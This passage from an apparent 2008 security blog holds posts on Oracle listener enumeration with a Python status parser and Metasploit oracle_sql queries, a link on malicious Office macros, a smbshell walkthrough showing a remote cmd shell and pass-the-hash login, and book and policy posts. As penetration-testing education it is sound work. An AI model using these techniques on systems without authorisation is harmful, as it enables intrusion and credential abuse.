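    "(ENDPOINT=(HANDLER=(STA=ready)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)"
    "(HOST=ab1.xxxxx.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,"
    "(SERVICE=(SERVICE_NAME=UNLUCKYDB.MYPWN)(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,"
    "(SERVICE=(SERVICE_NAME=UNLUCKYXDB.MYPWN)(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,"
    ".........@"
)


def parse_groups(s, i=0, depth=0):
    """Parse consecutive (KEY=VALUE) groups starting at position i.

    VALUE is a plain string, or a nested list of groups when it starts with
    '('.  Anything outside a group (framing bytes, ',,' separators, newlines)
    is skipped.  Returns (list of (key, value), position reached).
    """
    items = []
    n = len(s)
    while i < n:
        c = s[i]
        if c == "(":
            eq = s.find("=", i)
            if eq == -1:
                break
            key = s[i + 1:eq]
            i = eq + 1
            if i < n and s[i] == "(":
                children, i = parse_groups(s, i, depth + 1)
                items.append((key, children))
                i += 1                      # consume this group's closing ')'
            else:
                close = s.find(")", i)
                close = n if close == -1 else close
                items.append((key, s[i:close]))
                i = close + 1
        elif c == ")" and depth > 0:
            return items, i                 # the caller consumes it
        else:
            i += 1
    return items, i


def summarize(items):
    """Pull the audit-relevant fields out of a parsed status response."""
    out = {"version": None, "security": None, "endpoints": [], "services": []}
    for key, val in items:
        if key == "DESCRIPTION":
            d = dict(val)
            out["version"] = d.get("VERSION")
            out["security"] = d.get("SECURITY")
        elif key == "ENDPOINT":
            handler = dict(dict(val)["HANDLER"])
            addr = dict(dict(handler["DESCRIPTION"])["ADDRESS"])
            out["endpoints"].append((handler.get("PRE"), addr.get("HOST"), int(addr["PORT"])))
        elif key == "SERVICE":
            svc = dict(val)
            inst = dict(svc["INSTANCE"])
            out["services"].append((svc["SERVICE_NAME"], inst["INSTANCE_NAME"]))
    return out


def parse_listener_status(text):
    return summarize(parse_groups(text)[0])


def registered_names(summary):
    """Names the listener will actually accept in a connect descriptor.

    The SID (instance name) and the service names differ here, which is why
    connecting with just the SID got ORA-12514 above.
    """
    return {"service_names": [s for s, _ in summary["services"]],
            "instance_names": sorted({i for _, i in summary["services"]})}


def listener_warnings(summary):
    """Things a DBA would want fixed, judged from the status response alone."""
    warn = []
    if summary["security"] == "OFF":
        warn.append("no listener password is set (SECURITY=OFF)")
    for pre, host, port in summary["endpoints"]:
        if pre and pre.lower() in ("http", "ftp"):
            warn.append("%s presentation exposed on %s:%d" % (pre.upper(), host, port))
    return warn


if __name__ == "__main__":
    info = parse_listener_status(SAMPLE_STATUS)
    print(info["version"])
    print(registered_names(info))
    for w in listener_warnings(info):
        print("WARNING:", w)
```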



Let's try it with the service name instead: UNLUCKYXDB.MYPWN

msf auxiliary(oracle_sql) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
[*] PL/SQL Release 9.2.0.1.0 - Production
[*] CORE 9.2.0.1.0 Production
[*] TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
[*] NLSRTL Version 9.2.0.1.0 - Production
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >


**Yeah, it worked. Now it's time to get some more useful info:

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed


That's it for part 1. In part 2 we'll use some SQLi to hopefully bump Scott up to DBA and execute some OS commands.

CG

Saturday, November 15, 2008

Blown to Bits: Your Life, Liberty, and Happiness After the Digital Explosion Book Review


Blown to Bits: Your Life, Liberty, and Happiness After the Digital Explosion
by Hal Abelson, Ken Ledeen, Harry Lewis

4 stars

Witty (Hopefully) Amazon Title: My bits are gone and I want them back!

The authors of Blown to Bits: Your Life, Liberty, and Happiness After the Digital Explosion cover both new and old technologies and how they relate to today's cultural and political climates. They drive home the history of most of the technologies we can't live without and their tumultuous relationship with the legislative and judicial branches of the American government.

Breakdown of the chapters:

Chapter 1: Digital Explosion: Why Is It Happening, and What Is at Stake? 1
Chapter 2: Naked in the Sunlight: Privacy Lost, Privacy Abandoned 19
Chapter 3: Ghosts in the Machine: Secrets and Surprises of Electronic Documents 73
Chapter 4: Needles in the Haystack: Google and Other Brokers in the Bits Bazaar 109
Chapter 5: Secret Bits: How Codes Became Unbreakable 161
Chapter 6: Balance Toppled: Who Owns the Bits? 195
Chapter 7: You Can't Say That on the Internet: Guarding the Frontiers of Digital Expression 229
Chapter 8: Bits in the Air: Old Metaphors, New Technologies, and Free Speech 259
Conclusion: After the Explosion 295


All the chapters were well written, informative, and flow well together. I felt the authors did a great job breaking down the technical concepts behind the technologies well enough to give the required background (technical but not too technical) and then move into the political discussions of those technologies. The real value of the book was the "Your Life, Liberty, and Happiness" portion of the discussions. They discuss how the world has changed now that we are moving away from paper and everything is in bits. Who owns those bits, what are government and industry allowed to do with those bits, and what about privacy in our lives now that very detailed profiles of people can be generated from those bits (especially since we gave that information away for a few cents off at the register or for some "free service")?


There are plenty of books that discuss the 1's and 0's of the concepts but few I have read that talk about the privacy, governmental or cultural issues that arise from those technologies. Like one of the other reviewers(1) mentioned, there are plenty of "gee whiz" moments along with plenty of "I can't believe they did that" moments as well. A great read.




CG

Friday, November 14, 2008

Link: Writing malicious macros using metasploit


Good blog post over at securiteam on using the exe2vba portion of metasploit to embed malicious code into office documents. Fun!

http://blogs.securiteam.com/index.php/archives/1161

Of course, those attacks can be mitigated with proper group policy, but most places "need their macros!", so enjoy the pwnings.
CG

Tuesday, November 11, 2008

Passing the Hash and other fun with Tenable smbshell


Description

smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks :
  • Navigate thru the remote SMB shares and download files or obtain their version number
  • Read/Enumerate the remote SMB registry
  • Query/Start/Stop/Pause remote services
  • Obtain an interactive shell (cmd.exe) on the remote host
http://cgi.tenablesecurity.com/tenable/smbshell.php

Installation

smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.
To run smbshell, download it and run it thru the 'nasl' command-line utility :
$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin
Under Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do :
C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin

Usage

cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t 192.168.0.103 smbshell.nbin

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--

[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to 192.168.0.103...
[*] Authenticating to 192.168.0.103...

smbshell> help

The following commands are supported :

help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit

smbshell>

Oh, and shell. Shell is fun:

shell
[*] Opening share ADMIN$...
[*] Connected to ADMIN$ (192.168.0.100:41095 -> 192.168.0.101:445)
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot
woot

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>
C:\WINDOWS\system32>exit

[*] Removing remote command service...
[*] Remote command service removed.

Pass the Hash info
http://blog.tenablesecurity.com/2007/06/lmntlm-hash-sup.html

###########################################
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to 172.11.12.184...
[*] Authenticating to 172.11.12.184...

If you have no idea what NASL is:
http://blog.tenablesecurity.com/2007/06/using-the-nasl-.html

Thanks to MC for bringing this up to me.

Lastly, if I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off, because this has been out for over two years...I'll leave it at that.
CG

Saturday, November 8, 2008

Intrusion Debt and Security ROI and Security Malpractice


Richard Bejtlich has a new post, linked to an older one, that puts forward the idea of intrusion debt as the counter-argument to security ROI. I agree with RB that there is no ROI on security (he has lots of posts arguing this and they are good reads): doing things safely is your ROI, operating your network without compromise and data loss (or minimizing it) is your ROI, protecting your IP is your ROI. The slides in the new post ask what would happen if we allowed the people who build bridges to operate to the same standards as those who build networks. Scary, right?

"Imagine that you defer that cost by not detecting and responding to the intrusion. Perhaps the intruder is stealthy. Perhaps you detect the attack but cannot respond for a variety of reasons. The longer the intrusion remains active, I would argue, the more debt one builds."

"How many CEOs/CIOs/CTOs/CISOs/CSOs will look at the digital wreckage of an incident and wonder 'why didn't we see this happening?'"

The key to that is catching it in the first place and being able to adequately respond, or having policies in place, once you do see it. In 2008, I didn't think we would still be there, but we are, and it's sad.

I think business and government entities are lucky about how much they are allowed to shield (lie to) their customers and employees about network compromises. If a network has been owned for several months and the appropriate action wasn't taken (so at some point the compromise was discovered), should that be grounds for fines or lawsuits? You know that any domain will have some type of PII, intellectual property, or something worth protecting floating around. What are people to do about network/security malpractice? Is it feasible to hold those CxO people accountable at that level? What are common people supposed to do when there is gross negligence with their information? Current laws, regulations, and fines obviously aren't working or aren't a sufficient deterrent, and I'm not sure asking a technology-immature legislative system to come up with more unenforceable laws is a good solution either.

Thoughts on what to do?
CG

Tuesday, November 4, 2008

EFF NSA shirt...I gots mine!


CG

Saturday, November 1, 2008

Implementing NAP and NAC Security Technologies Book Review


Implementing NAP and NAC Security Technologies: The Complete Guide to Network Access Control

Dan Hoffman

4 stars

Witty Title for Amazon: Clear and Actionable Advice on Choosing the Right NAC Solution

Disclaimer:
I was asked to read a pre-release copy of the book, my quote made it onto the book, and I was given a review copy.

I found myself in a position to learn about the different types of NAC appliances as well as Mobile NAC. The problem is that I don't work for a NAC vendor or install NACs for a living. Googling left me with tons of vendor hype on NAC but not a lot of good information to help me understand the different types of NACs, how they work, and why I would choose one type over the other. Dan Hoffman's book is the only NAC book I know of that is (mostly) vendor neutral. The only other NAC/NAP books I know of are Cisco Press books, which obviously tout Cisco products as the best way to go. Dan Hoffman breaks down the functionality of NAC and the different types of NAC solutions into simple, easy-to-understand language, just like he did for mobile threats in Blackjacking. He has a great knack for explaining technical systems and topics in an easy-to-understand way.

Here is a list of what he covers in the book:

CH1 Understanding Terms and Technologies
CH2 The Technical Components of NAC Solutions
CH3 What Are You Trying to Protect?
CH4 Understanding the Need for LAN-Based NAC/NAP
CH5 Understanding the Need for Mobile NAC
CH6 Understanding Cisco Clean Access
CH7 Understanding Cisco Network Admission Control Framework
CH8 Understanding Fiberlink Mobile NAC
CH9 Understanding Microsoft NAP Solutions
CH10 Understanding NAC and NAP in Other Products

My favorite chapters are CH3 "What Are You Trying to Protect?", CH4 "Understanding the Need for LAN-Based NAC/NAP", and CH5 "Understanding the Need for Mobile NAC."

By far the most important chapter is chapter three, where Dan walks through the questions an organization needs to ask itself before it purchases a NAC solution. The company needs to know whether it is trying to protect LAN-based or mobile assets, and it needs to know exactly what it is trying to protect those assets against. Dan discusses the various scenarios that come out of those two questions, and the two follow-on chapters provide even more detail on how the two types of solutions (LAN-based and Mobile NAC) work and how they differ from one another. Chapter two covers the details of the different parts of NAC, and chapters 6-10 give some of the specifics about different NAC vendors' solutions (not a complete list).

The only thing I didn't like about the book was that it really didn't cover bypassing NAC. It would have been nice to see some content on how NAC is currently being bypassed or what NAC doesn't protect against and how to mitigate against it.



CG